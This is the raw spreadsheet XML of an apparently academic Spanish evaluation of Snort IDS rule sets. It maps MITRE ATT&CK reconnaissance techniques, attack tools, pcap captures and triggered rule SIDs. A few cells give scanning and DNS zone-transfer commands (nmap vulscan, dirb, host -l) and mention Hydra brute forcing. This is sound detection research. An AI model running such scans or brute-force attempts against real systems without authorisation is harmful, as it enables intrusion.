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office.chartex+xml" PartName="/xl/charts/chartEx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ms-office.chartstyle+xml" PartName="/xl/charts/style1.xml"/>
  <Override ContentType="application/vnd.ms-office.chartcolorstyle+xml" PartName="/xl/charts/colors1.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.styles+xml" PartName="/xl/styles.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart1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14.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart18.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart13.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart4.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart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8.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart15.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart17.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart9.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart1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 - Reglas Usadas" sheetId="1" r:id="rId4"/>
    <sheet state="visible" name="(B) - Detecciones" sheetId="2" r:id="rId5"/>
    <sheet state="visible" name="(C) - Tráfico Legítimo" sheetId="3" r:id="rId6"/>
    <sheet state="visible" name="(D) - Resultados" sheetId="4" r:id="rId7"/>
  </sheets>
  <definedNames/>
  <calcPr/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="3781" uniqueCount="1043">
  <si>
    <t>Nombre REGLA</t>
  </si>
  <si>
    <t>Descripción</t>
  </si>
  <si>
    <t>Versión</t>
  </si>
  <si>
    <t>Fecha</t>
  </si>
  <si>
    <t>RS1</t>
  </si>
  <si>
    <t>RS2</t>
  </si>
  <si>
    <t>RS3</t>
  </si>
  <si>
    <t>RS4</t>
  </si>
  <si>
    <t>Talos Community</t>
  </si>
  <si>
    <t>Las "Talos Community Rules" o reglas de la Comunidad han sido creadas por miembros de la comunidad de código abierto o integrantes de Snort. Estas reglas están disponibles para todos los usuarios de Snort y están controladas por GPLv2. Constituye un subconjunto de las Reglas "Talos Registered".</t>
  </si>
  <si>
    <t>-</t>
  </si>
  <si>
    <t>✔</t>
  </si>
  <si>
    <t>Talos Registered</t>
  </si>
  <si>
    <t>El paquete de reglas "Talos Registered" contiene más reglas que el paquete "Talos Community". Su naturaleza es similar.</t>
  </si>
  <si>
    <t>ETOpen</t>
  </si>
  <si>
    <t>Conjunto de reglas "Emerging Threats" alternativas a las reglas ofrecidas por Snort, pero igualmente compatibles. Este paquete constituye un subconjunto de las reglas optimizadas Emerging Threats (ETOpen Optimizada).</t>
  </si>
  <si>
    <t>ETOpen Optimizada</t>
  </si>
  <si>
    <t>Paquete de todas las reglas ofrecidas por Emerging Threats.</t>
  </si>
  <si>
    <t xml:space="preserve"> </t>
  </si>
  <si>
    <t>TÁCTICA</t>
  </si>
  <si>
    <t>OTRAS TÁCTICAS</t>
  </si>
  <si>
    <t>TÉCNICA</t>
  </si>
  <si>
    <t>ID TÉCNICA</t>
  </si>
  <si>
    <t>SUBTÉCNICA</t>
  </si>
  <si>
    <t>ID SUBTÉCNICA</t>
  </si>
  <si>
    <t>ATAQUE</t>
  </si>
  <si>
    <t>HERRAMIENTA</t>
  </si>
  <si>
    <t>FICHERO PCAP</t>
  </si>
  <si>
    <t>SID (sin repetición)</t>
  </si>
  <si>
    <t>#SID</t>
  </si>
  <si>
    <t>Número total de alertas</t>
  </si>
  <si>
    <t>SIDs en legítimo y ataque</t>
  </si>
  <si>
    <t>SIDs</t>
  </si>
  <si>
    <t>#SIDs</t>
  </si>
  <si>
    <t>DETECTABLE POR PATRONES</t>
  </si>
  <si>
    <t>MECANISMO DE DETECCIÓN</t>
  </si>
  <si>
    <t>DETALLES DE IMPLEMENTACIÓN DE ATAQUE</t>
  </si>
  <si>
    <t>PROCEDENCIA DEL PCAP</t>
  </si>
  <si>
    <t>DETECTABILIDAD</t>
  </si>
  <si>
    <t>ATAQUES COLATERALES</t>
  </si>
  <si>
    <t>CONTIENE FLUJOS INCOMPLETOS SIN SYN INICIAL</t>
  </si>
  <si>
    <t>Reconnaissance</t>
  </si>
  <si>
    <t>Active Scanning</t>
  </si>
  <si>
    <t>T1595</t>
  </si>
  <si>
    <t>Vulnerability Scanning</t>
  </si>
  <si>
    <t>T1595.002</t>
  </si>
  <si>
    <t>Escaneo de vulnerabilidades</t>
  </si>
  <si>
    <t>nmap</t>
  </si>
  <si>
    <t>T1595.002.pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010937,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002911</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010939</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010935</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002910</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,1421,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010936</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,1418,2023753,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2018317</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2034718,2013409,2034730,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2009358</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2024364</t>
    </r>
  </si>
  <si>
    <t>2010937, 2002911, 2002910, 2010935</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1421,1418,44484,44487,44485,44489,41807,50447,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010937</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002911</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010939</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010935</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002910</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010936</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2023753,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2018317</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2034718,2013409,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2034730</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2009358,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2024364</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752,2002749,2010937,2001689,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002911</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010939,2010935</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002910</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2100472,2100615,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010936</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2101418,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2006408</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2044666</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2023753,2007571,2003099,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2018317</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2034718,2013409,2034730,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2009358</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2024364,1421,1418,44484,44487,44485,44489,41807,50447</t>
    </r>
  </si>
  <si>
    <t>2002752, 2100615, 2010935, 2100472, 2010937, 2002749, 2002910, 2002911</t>
  </si>
  <si>
    <t>SI</t>
  </si>
  <si>
    <t>Regla genérica que detecte el envío de paquetes TCP con flag SYN activado a varios puertos diferentes</t>
  </si>
  <si>
    <t>Ejecución de comando nmap para escaneo de puertos y detección de vulnerabilidades (nmap -sV --script vulscan IP)</t>
  </si>
  <si>
    <t>Manual [3]</t>
  </si>
  <si>
    <t>NO</t>
  </si>
  <si>
    <t>Wordlist Scanning</t>
  </si>
  <si>
    <t>T1595.003</t>
  </si>
  <si>
    <t>Escaneo de página web</t>
  </si>
  <si>
    <t>Dirb</t>
  </si>
  <si>
    <t>T1595.003-web_page_scanning1.pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>31939</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 50447</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002749,2002752,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2009004</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2011085,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2012885</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>31939</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,50447</t>
    </r>
  </si>
  <si>
    <t>Regla genérica que detecte peticiones HTTP hacia muchas URLs diferentes con destino el mismo servidor</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">Ejecucion de comando dirb para escaneo de la estructura de directorios (dirb </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF1155CC"/>
        <sz val="11.0"/>
        <u/>
      </rPr>
      <t>http://IP</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> -w /usr/share/dirb/wordlist/vulns/apache.txt)</t>
    </r>
  </si>
  <si>
    <t>Manual [2]</t>
  </si>
  <si>
    <t>GoBuster</t>
  </si>
  <si>
    <t>T1595.003-web_page_scanning2.pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1434,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1433,1129,1071,1201,2062,43285,1288,940,937,1662,1489,1145,1301,879,1218,845,1213,885,1206,882,1231,1543,1551,839,825,1016,1141,1606,993,886,1877,895,1852,1520,1521,835,849,896,1826,853,43290,887</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101129,2101071,2027261,2022520,2101201,2027250,2101145,2010229,2101016,2100993,2019526,2101877,2027263,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1434</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,1433,1129,1071,1201,2062,43285,1288,940,937,1662,1489,1145,1301,879,1218,845,1213,885,1206,882,1231,1543,1551,839,825,1016,1141,1606,993,886,1877,895,1852,1520,1521,835,849,896,1826,853,43290,887, 2049402</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101129</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101071</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2027261,2022520</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2101201</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2027250,2101145,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010229</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101016,2100993</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2019526,2101877</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027263</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1434</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1433,1129,1071,1201,2062,43285,1288,940,937,1662,1489,1145,1301,879,1218,845,1213,885,1206,882</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1231</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1543,1551,839,825,1016,1141,1606,993,886,1877</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>895,1852,1520</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1521</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>835,849,896,1826</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>853,43290,887,50447,41742,33608,42289</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>59258</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2049402</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002749</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2101129,2101071,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027261</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2022520</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2101201,2009885,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027250</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2101288,2100937,2101662,2101489,2101145,2010229,2008330,2000560,2100884,2101016,2100993,2010377,2019526,2101877,2101852,2027263,1434,1433,1129,1071,1201,2062,43285,1288,940,937,1662,1489,1145,1301,879,1218,845,1213,885,1206,882,1231,1543,1551,839,825,1016,1141,1606,993,886,1877,895,1852,1520,1521,835,849,896,1826,853,43290,887,50447,41742,33608,42289,59258,2049402</t>
    </r>
  </si>
  <si>
    <t>2002752, 2002749</t>
  </si>
  <si>
    <t xml:space="preserve">Ejecucion de comando GoBuster para escaneo de la estructura de directorios </t>
  </si>
  <si>
    <t>Search Open Technical Databases</t>
  </si>
  <si>
    <t>T1596</t>
  </si>
  <si>
    <t>DNS/Passive DNS</t>
  </si>
  <si>
    <t>T1596.001</t>
  </si>
  <si>
    <t>Transferencia de zona DNS</t>
  </si>
  <si>
    <t>T1596.001.pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752,2002749,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100255,255</t>
    </r>
  </si>
  <si>
    <t>Regla genérica que detecte paquetes TCP dirigidos al puerto 53 que tengan los bytes "Question" igual a 1 y el resto a cero. Además, el campo "Type" debe tomar el valor "00 FC"</t>
  </si>
  <si>
    <t>Ejecución de comando para obtener informacion de la víctima (host -l javier.example.com IP)</t>
  </si>
  <si>
    <t>Phishing for Information</t>
  </si>
  <si>
    <t>T1598</t>
  </si>
  <si>
    <t>Spearphishing Link</t>
  </si>
  <si>
    <t>T1598.003</t>
  </si>
  <si>
    <t>Recogida de información de la víctima mediante ingeniería social</t>
  </si>
  <si>
    <t>SEToolKit</t>
  </si>
  <si>
    <t>T1598.003.pcapng</t>
  </si>
  <si>
    <t>2002752,2002749,2001117</t>
  </si>
  <si>
    <t>2002752, 2002749, 2001117</t>
  </si>
  <si>
    <t>Detección por listas negras/anomalías que permitan detectar tráfico de red correspondiente a correos electrónicos con enlaces maliciosos</t>
  </si>
  <si>
    <t>Servidor de correo mediante Postfix, Thunderbird, Bind, Dovecot</t>
  </si>
  <si>
    <t>Manual [5]</t>
  </si>
  <si>
    <t>Gather Victim Identity Information</t>
  </si>
  <si>
    <t>T1589</t>
  </si>
  <si>
    <t>Email Addresses</t>
  </si>
  <si>
    <t>T1589.002</t>
  </si>
  <si>
    <t>Recogida de cuentas de correo eléctronico y validación de las mismas</t>
  </si>
  <si>
    <t>theHarvester, bulk-email-verifier</t>
  </si>
  <si>
    <t>T1589.002_gather-victim-identity-information.pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte un número elevado de intentos de conexión y mensajes ehlo SMTP procedentes de un mismo origen hacia un servidor, con diferentes destinatarios.</t>
  </si>
  <si>
    <t>Manual [4]</t>
  </si>
  <si>
    <t>Resource Development</t>
  </si>
  <si>
    <t>Compromise Accounts</t>
  </si>
  <si>
    <t>T1586</t>
  </si>
  <si>
    <t>Social Media Accounts</t>
  </si>
  <si>
    <t>T1586.001</t>
  </si>
  <si>
    <t>Fuerza bruta para acceso a web</t>
  </si>
  <si>
    <t>Hydra</t>
  </si>
  <si>
    <t>T1586.001.pcapng</t>
  </si>
  <si>
    <t>1016, 1025, 1071, 1129, 1141, 1145, 1201, 1206, 1213, 1218, 1231, 1288, 1301, 1433, 1434, 1489, 1520, 1521, 1543, 1551, 1606, 1662, 1826, 1852, 1877, 2062, 43285, 43290, 825, 835, 839, 845, 849, 853, 879, 882, 885, 886, 887, 895, 896, 937, 940, 993</t>
  </si>
  <si>
